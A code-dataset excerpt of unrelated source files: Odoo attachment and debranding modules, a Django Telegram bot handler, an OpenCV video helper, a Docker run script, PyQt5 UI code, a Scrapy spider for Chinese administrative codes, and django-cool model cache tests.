@tagged("post_install", "-at_install")
class TestDataGet(HttpCase):
def test_data_get(self):
test_attachment = self.env.ref("ir_attachment_url.test_url_attachment")
self.env["ir.attachment"].search_read(
[("id", "=", test_attachment.id)], ["id", "datas"]
)
def test_open_url(self):
user_demo = self.env.ref("base.user_demo")
url = "/web/image?model=res.users&id={}&field=image_medium".format(user_demo.id)
self.url_open(url)
```
#### File: ir_attachment_url/tests/test_product_tmpl_image.py
```python
import logging
from odoo import api, conf
from odoo.tests.common import HttpCase, tagged
_logger = logging.getLogger(__name__)
@tagged("post_install", "-at_install")
class TestProductTmplImage(HttpCase):
def _get_original_image_url(self, px=1024):
return "https://upload.wikimedia.org/wikipedia/commons/thumb/1/1e/Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg/{}px-Gullfoss%2C_an_iconic_waterfall_of_Iceland.jpg".format(
px
)
def _get_odoo_image_url(self, model, record_id, field):
return "/web/image?model={}&id={}&field={}".format(model, record_id, field)
def test_getting_product_variant_image_fields_urls(self):
assert (
"ir_attachment_url" in conf.server_wide_modules
), "ir_attachment_url is not in server_wide_modules. Please add it via --load parameter"
env = api.Environment(self.registry.test_cr, self.uid, {})
env["ir.config_parameter"].set_param("ir_attachment_url.storage", "url")
product_tmpl = env["product.template"].create(
{
"name": "Test template",
"image": self._get_original_image_url(1024),
"image_medium": self._get_original_image_url(128),
"image_small": self._get_original_image_url(64),
}
)
product_product = env["product.product"].create(
{
"name": "<NAME>",
"image": False,
"image_medium": False,
"image_small": False,
"product_tmpl_id": product_tmpl.id,
}
)
odoo_image_url = self._get_odoo_image_url(
"product.product", product_product.id, "image"
)
odoo_image_medium_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_medium"
)
odoo_image_small_url = self._get_odoo_image_url(
"product.product", product_product.id, "image_small"
)
product_tmpl_image_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image", product_tmpl
)
product_tmpl_image_medium_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image_medium", product_tmpl
)
product_tmpl_image_small_attachment = env["ir.http"].find_field_attachment(
env, "product.template", "image_small", product_tmpl
)
self.assertTrue(product_tmpl_image_attachment)
self.assertTrue(product_tmpl_image_medium_attachment)
self.assertTrue(product_tmpl_image_small_attachment)
self.authenticate("demo", "demo")
self.assertEqual(
self.url_open(odoo_image_url).url, product_tmpl_image_attachment.url
)
self.assertEqual(
self.url_open(odoo_image_medium_url).url,
product_tmpl_image_medium_attachment.url,
)
self.assertEqual(
self.url_open(odoo_image_small_url).url,
product_tmpl_image_small_attachment.url,
)
```
#### File: web_debranding/models/ir_actions.py
```python
from odoo import models
class IrActionsActWindowDebranding(models.Model):
_inherit = "ir.actions.act_window"
def read(self, fields=None, load="_classic_read"):
results = super(IrActionsActWindowDebranding, self).read(
fields=fields, load=load
)
if not fields or "help" in fields:
params = self.env["ir.config_parameter"].get_debranding_parameters()
new_name = params.get("web_debranding.new_name")
for res in results:
if isinstance(res, dict) and res.get("help"):
res["help"] = res["help"].replace("Odoo", new_name)
return results
```
#### File: web_debranding/models/ir_ui_view.py
```python
import logging
from odoo import api, models
from odoo.tools import mute_logger
from .ir_translation import debrand
_logger = logging.getLogger(__name__)
MODULE = "_web_debranding"
class View(models.Model):
_inherit = "ir.ui.view"
def read_combined(self, fields=None):
res = super(View, self).read_combined(fields=fields)
res["arch"] = debrand(self.env, res["arch"], is_code=True)
return res
@api.model
def _create_debranding_views(self):
"""Create UI views that may work only in one Odoo edition"""
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_mobile_icon",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//link[@rel='icon']" position="replace">
<t t-set="icon" t-value="request and request.env['ir.config_parameter'].get_debranding_parameters().get('web_debranding.icon_url', '')"/>
<t t-if="icon">
<link rel="icon" sizes="192x192" t-att-href="icon" type="image/x-icon"/>
</t>
</xpath>""",
)
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_apple_touch_icon",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//link[@rel='apple-touch-icon']" position="replace">
<t t-if="icon">
<link rel="apple-touch-icon" t-att-href="icon" type="image/x-icon"/>
</t>
</xpath>""",
)
# Odoo EE
self._create_view(
"webclient_bootstrap_enterprise_windows_phone",
"web_enterprise.webclient_bootstrap",
"""
<xpath expr="//meta[@name='msapplication-TileImage']" position="replace">
<t t-if="icon">
<meta name="msapplication-TileImage" t-att-content="icon"/>
</t>
</xpath>""",
)
@api.model
def _create_view(self, name, inherit_id, arch, noupdate=False, view_type="qweb"):
view = self.env.ref("{}.{}".format(MODULE, name), raise_if_not_found=False)
if view:
try:
view.write({"arch": arch})
view._check_xml()
except Exception:
_logger.warning(
"Cannot update view %s. Delete it.", name, exc_info=True
)
view.unlink()
return
return view.id
try:
with self.env.cr.savepoint(), mute_logger("odoo.models"):
view = self.env["ir.ui.view"].create(
{
"name": name,
"type": view_type,
"arch": arch,
"inherit_id": self.env.ref(
inherit_id, raise_if_not_found=True
).id,
}
)
view._check_xml()
except Exception:
_logger.debug("Cannot create view %s. Cancel.", name, exc_info=True)
return
self.env["ir.model.data"].create(
{
"name": name,
"model": "ir.ui.view",
"module": MODULE,
"res_id": view.id,
"noupdate": noupdate,
}
)
return view.id
```
#### File: web_debranding/models/res_users.py
```python
from odoo import fields, models
class ResUsers(models.Model):
_inherit = "res.users"
odoobot_state = fields.Selection(string="Bot Status")
def is_admin(self):
# By default Python functions starting with _ are considered private methods.
# Private methods (such as _is_admin) cannot be called remotely
return self._is_admin()
``` |
{
"source": "00111/pelegram",
"score": 2
} |
#### File: pelegram/django_pelegram/bot_handler.py
```python
from django.http import JsonResponse
from django.conf import settings
import requests
import re
class Request(object):
def __init__(self, payload):
self.payload = payload
if 'message' in self.payload.keys():
self.data = self.message_request()
elif 'edited_message' in self.payload.keys():
self.data = self.edited_message_request()
elif 'callback_query' in self.payload.keys():
self.data = self.callback_query_request()
def callback_query_request(self):
data = {
'text': self.payload['callback_query']['data'],
'chat_id': self.payload['callback_query']['message']['chat']['id'],
'callback_query_id': self.payload['callback_query']['id'],
'user': self.payload['callback_query']['from']['id'],
'type': 'callback_query',
'testing_request': True if 'testing_request' in self.payload.keys() else False,
'message_id': self.payload['callback_query']['message']['message_id']
}
return data
def message_request(self):
data = {
'text': self.payload['message']['text'],
'chat_id': self.payload['message']['chat']['id'],
'user': self.payload['message']['from']['id'],
'type': 'message',
'testing_request': True if 'testing_request' in self.payload.keys() else False
}
return data
def edited_message_request(self):
data = {
'text': self.payload['edited_message']['text'],
'chat_id': self.payload['edited_message']['chat']['id'],
'user': self.payload['edited_message']['from']['id'],
'type': 'edited_message',
'testing_request': True if 'testing_request' in self.payload.keys() else False
}
return data
class BotBasic(object):
def __init__(self, payload=None, bot_token=None):
self.bot_token = bot_token
self.request = Request(payload)
self.answer = {}
def get_command(self, parse_text=''):
parse_string = self.request.data['text'] if parse_text == '' else parse_text
re_command = re.match(r'^/\w+', parse_string)
command = ""
if re_command:
command = re_command.group().replace('/', '')
return command
def dont_understand_message(self):
return "Bot don't understand your command ¯\_(ツ)_/"
def json_response(self, data, status=200):
return JsonResponse(data, status=status)
def exception_template(self, err):
return "Run-time error:\n{0}\n\nDELETE THIS OUTPUT FROM PRODUCTION!\n".format(err)
def telegram_request(self, method, **kwargs):
telegram_url = "{0}/bot{1}/".format(settings.TELEGRAM_API_URL, self.bot_token)
telegram_response = requests.post(telegram_url + method, **kwargs)
return telegram_response
def answer_on_callback_query(self):
if self.request.data['type'] == 'callback_query':
if 'answer_callback' in self.answer:
answer_callback_query_data = dict(callback_query_id=self.request.data['callback_query_id'],
**self.answer['answer_callback'])
else:
answer_callback_query_data = dict(callback_query_id=self.request.data['callback_query_id'],
text="Bot is typing")
response = self.telegram_request("answerCallbackQuery", data=answer_callback_query_data)
else:
response = None
return response
def send_answer(self):
answer_callback_response = self.answer_on_callback_query()
if answer_callback_response is None:
answer_responses = {}
else:
answer_responses = {"answer_callback": answer_callback_response}
messages_response = []
for message in self.answer['messages']:
response = self.processing_message_action(message)
messages_response.append(response)
answer_responses['messages'] = messages_response
return answer_responses
def processing_message_action(self, message):
handled_message = {'data': {}}
for key in message['data'].keys():
if key == 'file':
handled_message['files'] = {'photo': open(message.data['file'], 'rb')}
else:
handled_message['data'][key] = message['data'][key]
send_message_data = dict(chat_id=self.request.data['chat_id'], **handled_message['data'])
if 'files' in handled_message.keys():
response = self.telegram_request(message['action'], data=send_message_data, files=handled_message['files'])
else:
response = self.telegram_request(message['action'], data=send_message_data)
return response
``` |
{
"source": "001honi/video-processing",
"score": 3
} |
#### File: video-processing/homework-3/video.py
```python
import numpy as np
import cv2
class Video():
FONT = cv2.FONT_HERSHEY_SIMPLEX
BLUE = (255,0,0)
GREEN= (0,255,0)
RED = (0,0,255)
def __init__(self,path):
self.path = path
self.frames_inp = []
self.frames_out = []
self.total_frame = None
self.shape = (None,None) # H,W
def read_frames(self,gray=False,rescale=0):
"""
stores all the frames in the given video source in
self.frames_inp (list) as [frame0, frame1, ...]
where frame# is numpy array
"""
try:
source = cv2.VideoCapture(self.path)
prop = cv2.CAP_PROP_FRAME_COUNT
self.total_frame = int(source.get(prop))
except:
print("Error in Path or Frame Count")
exit()
for i in range(self.total_frame):
ret, frame = source.read()
if not (ret or frame):
print("Error in Frame Read")
break
if gray:
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
if not self.shape[0]:
self.shape = frame.shape[:2]
if rescale:
W = int(self.shape[1] * rescale / 100)
H = int(self.shape[0] * rescale / 100)
frame = cv2.resize(frame, (W,H), interpolation=cv2.INTER_AREA)
self.frames_inp.append(frame)
print("[INFO] Video Import Completed")
def write(self, path="out.avi",fps=30,gray2bgr=False):
H = self.frames_out[0].shape[0]
W = self.frames_out[0].shape[1]
# fourcc = cv2.VideoWriter_fourcc(*"MJPG")
fourcc = -1 # for Windows machines
writer = cv2.VideoWriter(path,fourcc,fps,(W,H),True)
for frame in self.frames_out:
if gray2bgr:
frame = cv2.cvtColor(frame,cv2.COLOR_GRAY2BGR)
writer.write(frame)
print("[INFO] Video Export Completed")
``` |
{
"source": "001zwzwzw/dagar-avoidance",
"score": 2
} |
#### File: dagar-avoidance/docker/run.py
```python
import argparse
import os
import shutil
import subprocess
def main(args):
checkArgs(args)
runGlobalPrerequisites()
workingDir = findWorkingDir(args)
if args.run:
buildContainers(args, workingDir)
runContainers(args, workingDir)
elif args.stop:
stopContainers(workingDir)
elif args.build:
buildContainers(args, workingDir)
elif args.rebuild:
rebuildContainers(args, workingDir)
else:
runContainers(args, workingDir)
def createArgsParser():
parser = argparse.ArgumentParser()
parser.add_argument("planner", help="the planner to start (local | global)")
addRunModes(parser)
addRunCommands(parser)
return parser.parse_args()
def addRunModes(parser):
runMode = parser.add_mutually_exclusive_group()
runMode.add_argument("--sim", help="run in gazebo", action="store_true")
runMode.add_argument("--prod-debug", help="deploy in debug mode, allowing an external machine to connect to the ROS network through VPN (useful for plotting topics in rviz while running on the drone)", action="store_true")
runMode.add_argument("--prod-release", help="deploy in release mode", action="store_true")
def addRunCommands(parser):
runCommands = parser.add_mutually_exclusive_group()
runCommands.add_argument("--run", help="build and run the containers", action="store_true")
runCommands.add_argument("--run-only", help="run the containers (this is the default)", action="store_true")
runCommands.add_argument("--stop", help="stop the containers, if running", action="store_true")
runCommands.add_argument("--build", help="build the containers if necessary (internally running `docker-compose build`)", action="store_true")
runCommands.add_argument("--rebuild", help="rebuild the containers from scratch (internally running `docker-compose build --no-cache`)", action="store_true")
def checkArgs(args):
if args.planner != "local" and args.planner != "global":
print("Planner has to be \"local\" or \"global\"!")
exit(1)
def runGlobalPrerequisites():
while isDockerComposeNotInstalled():
installDockerCompose()
def isDockerComposeNotInstalled():
return shutil.which("docker-compose") == ''
def installDockerCompose():
print("You need to install docker-compose in order to run this script. From another terminal, follow these instructions:")
if os.path.exists("/usr/local/bin"):
installPath = "/usr/local/bin"
else:
installPath = "/usr/bin"
sysname = os.uname().sysname
machine = os.uname().machine
remotePath = "https://github.com/docker/compose/releases/download/1.17.0/docker-compose-{}-{}".format(sysname, machine)
curlCommand = "sudo curl -L {} -o {}/docker-compose".format(remotePath, installPath)
print()
print(" 1. Run: $ {}".format(curlCommand))
print(" 2. Run: $ sudo chmod +x {}/docker-compose".format(installPath))
print()
input("When finished, press any key to continue...\n")
def findWorkingDir(args):
if args.prod_release:
return "./{}_planner/{}-planner-prod/{}-planner-prod-release".format(args.planner, args.planner, args.planner)
elif args.prod_debug:
return "./{}_planner/{}-planner-prod/{}-planner-prod-debug".format(args.planner, args.planner, args.planner)
else:
return "./{}_planner/{}-planner-dev".format(args.planner, args.planner)
def runContainers(args, workingDir):
if args.prod_release:
print("Deploying {}_planner in RELEASE mode".format(args.planner))
elif args.prod_debug:
print("Deploying {}_planner in DEBUG mode".format(args.planner))
else:
print("Running simulation for planner {}".format(args.planner))
subprocess.call("{}/run.sh".format(workingDir), shell=True)
def stopContainers(workingDir):
subprocess.call("docker-compose -f {}/docker-compose.yml down".format(workingDir), shell=True)
def buildContainers(args, workingDir):
subprocess.call("docker-compose -f ./components/components.yml build mavros", shell=True)
subprocess.call("docker-compose -f {}/docker-compose.yml build".format(workingDir), shell=True)
if not args.prod_release and not args.prod_debug:
subprocess.call("docker-compose -f ./components/components.yml build sitl-avoidance-server", shell=True)
def rebuildContainers(args, workingDir):
subprocess.call("docker-compose -f ./components/components.yml build --no-cache mavros", shell=True)
subprocess.call("docker-compose -f {}/docker-compose.yml build --no-cache".format(workingDir), shell=True)
if not args.prod_release and not args.prod_debug:
subprocess.call("docker-compose -f ./components/components.yml build --no-cache sitl-avoidance-server", shell=True)
if __name__ == '__main__':
args = createArgsParser()
main(args)
``` |
{
"source": "003userye/003-",
"score": 2
} |
#### File: Python_source/心语/Ui_心语UI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(1000, 618)
Form.setMinimumSize(QtCore.QSize(1000, 618))
Form.setMaximumSize(QtCore.QSize(1000, 618))
font = QtGui.QFont()
font.setFamily("华文细黑")
font.setBold(False)
font.setWeight(50)
Form.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Form.setWindowIcon(icon)
Form.setStyleSheet("background-image:url(D:/A_图/beijing.jpg);")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(20, 10, 71, 71))
self.label.setStyleSheet("QLabel\n"
"{\n"
" background:transparent;\n"
"}")
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png"))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(90, 20, 54, 19))
self.label_2.setStyleSheet("QLabel\n"
"{\n"
" font-size : 15pt;\n"
" background:transparent;\n"
"}\n"
"\n"
"\n"
"")
self.label_2.setObjectName("label_2")
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(190, 40, 261, 151))
self.pushButton.setStyleSheet("QPushButton \n"
"{\n"
" \n"
" background-color:rgb(255,255,255); \n"
" color:rgb(6,168,255); \n"
" border:2px solid rgb(6,168,255); \n"
" font-size:14px; \n"
" border-radius:10px;\n"
"}\n"
"QPushButton:hover\n"
"{\n"
" background-color: rgb(212,243,255); \n"
" color:rgb(6,168,255);\n"
" border:2px solid rgb(6,168,255); \n"
" border-radius:14px;\n"
"}\n"
"QPushButton:pressed\n"
"{\n"
" background-color: rgb(175,232,255); \n"
" color:white; \n"
" border:2px solid rgb(6,168,255); \n"
" border-radius:14px;\n"
"}")
self.pushButton.setText("")
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setGeometry(QtCore.QRect(200, 50, 50, 50))
self.pushButton_2.setStyleSheet("/*按钮静止无操作样式*/\n"
"QPushButton\n"
"{\n"
" background-image:rgb(255,255,255); \n"
" border-radius:25px;\n"
" border:2px solid rgb(6,168,255);\n"
" \n"
" \n"
"}\n"
"\n"
"/*鼠标悬停在按钮*/\n"
"QPushButton:hover\n"
"{\n"
" background-color: rgb(212,243,255);\n"
" color:rgb(6,168,255);\n"
" border:2px solid rgb(6,168,255);\n"
" border-radius:25px;\n"
"}\n"
"\n"
"/*鼠标按下按钮*/\n"
"QPushButton:pressed\n"
"{\n"
" background-color: rgb(175,232,255);\n"
" color:white;\n"
" border:2px solid rgb(6,168,255);\n"
" border-radius:25px;\n"
"}")
self.pushButton_2.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/favicon (2).ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_2.setIcon(icon1)
self.pushButton_2.setIconSize(QtCore.QSize(50, 50))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setGeometry(QtCore.QRect(250, 50, 75, 23))
font = QtGui.QFont()
font.setFamily("华文隶书")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.pushButton_3.setFont(font)
self.pushButton_3.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pushButton_3.setStyleSheet("/*按钮静止无操作样式*/\n"
"QPushButton \n"
"{\n"
" background:transparent;\n"
"}\n"
"\n"
"/*鼠标悬停在按钮*/\n"
"QPushButton:hover\n"
"{\n"
" background:transparent;\n"
" text-decoration:underline;\n"
"}\n"
"\n"
"/*鼠标按下按钮*/\n"
"QPushButton:pressed\n"
"{\n"
"#测试;\n"
"}")
self.pushButton_3.setObjectName("pushButton_3")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(260, 80, 161, 16))
font = QtGui.QFont()
font.setFamily("Bahnschrift Condensed")
self.label_3.setFont(font)
self.label_3.setStyleSheet("QLabel\n"
"{\n"
" background:transparent;\n"
"}")
self.label_3.setObjectName("label_3")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setGeometry(QtCore.QRect(200, 110, 241, 75))
font = QtGui.QFont()
font.setFamily("华文隶书")
font.setBold(False)
font.setWeight(50)
self.textBrowser.setFont(font)
self.textBrowser.setStyleSheet("")
self.textBrowser.setObjectName("textBrowser")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(270, 320, 281, 61))
self.label_4.setStyleSheet("QLabel{\n"
"\n"
"border-radius:12px\n"
"\n"
"\n"
"}")
self.label_4.setObjectName("label_4")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "心语"))
self.label_2.setText(_translate("Form", "<html><head/><body><p><span style=\" color:#aaffff;\">〇〇3</span></p></body></html>"))
self.pushButton_3.setText(_translate("Form", "这个年纪"))
self.label_3.setText(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Bahnschrift Condensed\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'SimSun\'; font-size:10pt; font-weight:600; color:#00ff7f;\">12-4 23:47:06</span></p></body></html>"))
self.textBrowser.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'华文隶书\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:15px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; line-height:24px; background-color:#ffffff;\"><span style=\" font-family:\'arial,宋体,sans-serif\'; font-size:14px; color:#333333; background-color:#ffffff;\">慈母用手中的针线,为远行的儿子赶制身上的衣衫。临行前一针针密密地缝缀,怕的是儿子回来得晚衣服破损。有谁敢说,子女像小草那样微弱的孝心,能够报答得了像春晖普泽的慈母恩情呢?</span></p></body></html>"))
self.label_4.setText(_translate("Form", "TextLabel"))
``` |
{
"source": "007gzs/china_admincode",
"score": 3
} |
#### File: admincode/spiders/stats.py
```python
import scrapy
from admincode.items import AdmincodeItem
class StatsSpider(scrapy.Spider):
name = 'stats'
allowed_domains = ['stats.gov.cn']
start_urls = ['http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/index.html']
def parse(self, response):
for ret in self.parse_provincetr(response, response.selector.css(".provincetr")):
yield ret
for ret in self.parse_citytr(response, response.selector.css(".citytr")):
yield ret
for ret in self.parse_countytr(response, response.selector.css(".countytr")):
yield ret
for ret in self.parse_towntr(response, response.selector.css(".towntr")):
yield ret
for ret in self.parse_villagetr(response, response.selector.css(".villagetr")):
yield ret
def get_text_href(self, td):
if not td.xpath('a'):
return td.xpath('text()').extract()[0], None
else:
return td.xpath('a/text()').extract()[0], td.xpath('a/@href').extract()[0]
def parse_provincetr(self, response, trs):
for td in trs.xpath('td'):
item = AdmincodeItem()
item['codetype'] = 'province'
item['name'], href = self.get_text_href(td)
if href:
item['code'] = href.split('.')[0] + ('0' * 10)
item['parent_code'] = item.get_parent()
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
def parse_2td(self, response, trs, codetype):
for tr in trs:
item = AdmincodeItem()
item['codetype'] = codetype
item['code'], href = self.get_text_href(tr.xpath('td')[0])
item['parent_code'] = item.get_parent()
if href:
item['url'] = response.urljoin(href)
item['name'], href = self.get_text_href(tr.xpath('td')[1])
if href:
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
def parse_citytr(self, response, trs):
return self.parse_2td(response, trs, 'city')
def parse_countytr(self, response, trs):
return self.parse_2td(response, trs, 'county')
def parse_towntr(self, response, trs):
return self.parse_2td(response, trs, 'town')
def parse_villagetr(self, response, trs):
for tr in trs:
item = AdmincodeItem()
item['codetype'] = 'village'
item['code'], href = self.get_text_href(tr.xpath('td')[0])
item['parent_code'] = item.get_parent()
if href:
item['url'] = response.urljoin(href)
item['towntypecode'], href = self.get_text_href(tr.xpath('td')[1])
if href:
item['url'] = response.urljoin(href)
item['name'], href = self.get_text_href(tr.xpath('td')[2])
if href:
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
``` |
{
"source": "007gzs/django-cool",
"score": 2
} |
#### File: cool/core/utils.py
```python
import operator
from functools import reduce
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.db.models.constants import LOOKUP_SEP
def split_camel_name(name, fall=False):
"""
驼峰命名分割为单词
GenerateURLs => [Generate, URLs]
generateURLsLite => [generate, URLs, Lite]
"""
if not name:
return []
lastest_upper = name[0].isupper()
idx_list = []
for idx, char in enumerate(name):
upper = char.isupper()
# rising
if upper and not lastest_upper:
idx_list.append(idx)
# falling
elif fall and not upper and lastest_upper:
idx_list.append(idx-1)
lastest_upper = upper
l_idx = 0
name_items = []
for r_idx in idx_list:
if name[l_idx:r_idx]:
name_items.append(name[l_idx:r_idx])
l_idx = r_idx
if name[l_idx:]:
name_items.append(name[l_idx:])
return name_items
def construct_search(queryset, field_name):
"""
生成搜索关键字
"""
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
# Use field_name if it includes a lookup.
opts = queryset.model._meta
lookup_fields = field_name.split(LOOKUP_SEP)
# Go through the fields, following all relations.
prev_field = None
for path_part in lookup_fields:
if path_part == 'pk':
path_part = opts.pk.name
try:
field = opts.get_field(path_part)
except FieldDoesNotExist:
# Use valid query lookups.
if prev_field and prev_field.get_lookup(path_part):
return field_name
else:
prev_field = field
if hasattr(field, 'get_path_info'):
# Update opts to follow the relation.
opts = field.get_path_info()[-1].to_opts
# Otherwise, use the field with icontains.
return "%s__icontains" % field_name
def get_search_results(queryset, search_term, search_fields, model):
"""
Return a tuple containing a queryset to implement the search
and a boolean indicating if the results may contain duplicates.
"""
try:
from django.contrib.admin.utils import (
lookup_needs_distinct as lookup_spawns_duplicates,
)
except ImportError:
from django.contrib.admin.utils import lookup_spawns_duplicates
use_distinct = False
if search_fields and search_term:
orm_lookups = [construct_search(queryset, str(search_field)) for search_field in search_fields]
for bit in search_term.split():
or_queries = [Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups]
queryset = queryset.filter(reduce(operator.or_, or_queries))
use_distinct |= any(lookup_spawns_duplicates(model._meta, search_spec) for search_spec in orm_lookups)
return queryset, use_distinct
```
#### File: tests/model/test_models.py
```python
from django.test import TestCase
from tests.model import models
class ModelTests(TestCase):
def setUp(self):
models.TestModel.objects.all().delete()
models.SubModel.objects.all().delete()
models.SubModel.objects.create(id=1, unique_field="sub1_unique_field")
models.SubModel.objects.create(id=2, unique_field="sub2_unique_field")
models.SubModel.objects.create(id=3, unique_field="sub3_unique_field")
models.TestModel.objects.create(
id=1,
unique_field="obj1_unique_field",
unique_field2_id=1,
unique_field3_id='sub2_unique_field',
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
unique_together2_field1="obj1_unique_together2_field1",
unique_together2_field2="obj1_unique_together2_field2",
unique_together2_field3="obj1_unique_together2_field3",
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132,
unique_together4_field1_id=2,
unique_together4_field2_id='sub3_unique_field'
)
models.TestModel.objects.create(
id=2,
unique_field="obj2_unique_field",
unique_field2_id=3,
unique_field3_id='sub1_unique_field',
unique_together1_field1="obj2_unique_together1_field1",
unique_together1_field2="obj2_unique_together1_field2",
unique_together2_field1="obj2_unique_together2_field1",
unique_together2_field2="obj2_unique_together2_field2",
unique_together2_field3="obj2_unique_together2_field3",
unique_together3_field1="obj2_unique_together3_field1",
unique_together3_field2=232,
unique_together4_field1_id=1,
unique_together4_field2_id='sub2_unique_field'
)
def test_pk(self):
obj = models.TestModel.get_obj_by_pk_from_cache(1)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_pks(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_pks_from_cache([2, 1], _dict_keys_list=dict_keys_list)
self.assertIsInstance(objs, dict)
self.assertEqual(len(dict_keys_list), 2)
self.assertEqual(len(objs), 2)
self.assertEqual(objs[dict_keys_list[0]].pk, 2)
self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj2_unique_field')
self.assertEqual(objs[dict_keys_list[1]].pk, 1)
self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj1_unique_field')
def test_unique_key(self):
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field')
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_unique_keys(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_unique_keys_from_cache(
unique_field=['obj1_unique_field', 'obj2_unique_field'], _dict_keys_list=dict_keys_list
)
self.assertEqual(len(dict_keys_list), 2)
self.assertIsInstance(objs, dict)
self.assertEqual(len(objs), 2)
self.assertEqual(objs[dict_keys_list[0]].pk, 1)
self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(objs[dict_keys_list[1]].pk, 2)
self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj2_unique_field')
def test_foreign_unique_key(self):
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2='1')
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2=models.SubModel.objects.get(pk=1))
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=models.SubModel.objects.get(pk=1))
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 2)
def test_foreign_unique_keys(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_unique_keys_from_cache(
unique_field2=['1', 3], _dict_keys_list=dict_keys_list
)
self.assertIsInstance(objs, dict)
self.assertEqual(objs[dict_keys_list[0]].pk, 1)
self.assertEqual(objs[dict_keys_list[1]].pk, 2)
def test_unique_together(self):
obj1 = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
)
self.assertIsInstance(obj1, models.TestModel)
self.assertEqual(obj1.pk, 1)
self.assertEqual(obj1.unique_field, 'obj1_unique_field')
obj2 = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together2_field1="obj2_unique_together2_field1",
unique_together2_field2="obj2_unique_together2_field2",
unique_together2_field3="obj2_unique_together2_field3"
)
self.assertIsInstance(obj2, models.TestModel)
self.assertEqual(obj2.pk, 2)
